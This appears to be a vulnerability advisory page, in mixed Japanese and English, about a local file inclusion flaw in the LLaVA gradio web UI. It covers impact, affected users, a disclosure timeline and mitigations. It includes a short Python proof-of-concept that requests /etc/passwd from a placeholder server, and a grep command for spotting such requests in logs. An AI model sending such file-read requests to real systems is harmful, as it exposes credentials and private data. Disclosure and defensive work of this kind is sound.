haotian-liu/llava におけるローカルファイルインクルージョン

このローカルファイルインクルージョン脆弱性は、攻撃者にとって非常に危険です。攻撃者は、LLaVAのWeb UIに細工されたリクエストを送信することで、システム上の任意のファイルの内容を読み取ることができます。これにより、機密情報（APIキー、パスワード、データベース接続情報など）が漏洩する可能性があります。さらに、攻撃者はこの脆弱性を悪用して、システム上で任意のコードを実行したり、他のシステムに侵入したりする可能性があります。この脆弱性は、類似のファイルインクルージョン脆弱性と同様に、システム全体のセキュリティを脅かす可能性があります。

Users deploying LLaVA for research or experimentation, particularly those using the gradio web UI for interactive demonstrations, are at risk. Shared hosting environments where LLaVA is deployed alongside other applications are also vulnerable, as a successful exploit could potentially compromise the entire host.

• python / server:

import os
import requests

# Target URL
url = "http://your-llava-server/gradio_app"

# Attempt to read a sensitive file
file_to_read = "/etc/passwd"

# Craft the request
params = {'file': file_to_read}

# Send the request
response = requests.get(url, params=params)

# Check the response
if response.status_code == 200:
    print(f"File content: {response.text}")
else:
    print(f"Request failed with status code: {response.status_code}")

• linux / server:

# Monitor access logs for suspicious file requests
grep -i "/etc/passwd" /var/log/apache2/access.log

1. 2025-03-20Disclosure

   disclosure

1. 予約済み2024-12-02
2. 公開日2025-03-20
3. 更新日2025-10-15
4. EPSS 更新日2026-04-02

この脆弱性への最も効果的な対策は、LLaVAを最新バージョンにアップグレードすることです。開発者は、脆弱性の修正を含む新しいバージョンをリリースしている可能性があります。アップグレードがすぐに利用できない場合、入力検証を強化することで、脆弱性の悪用を軽減できます。具体的には、ファイル名やパスを検証し、許可されていない文字やパターンを排除する必要があります。また、Webアプリケーションファイアウォール（WAF）を導入して、悪意のあるリクエストをブロックすることも有効です。WAFのルールを設定し、ファイルインクルージョン攻撃のパターンを検出するように構成してください。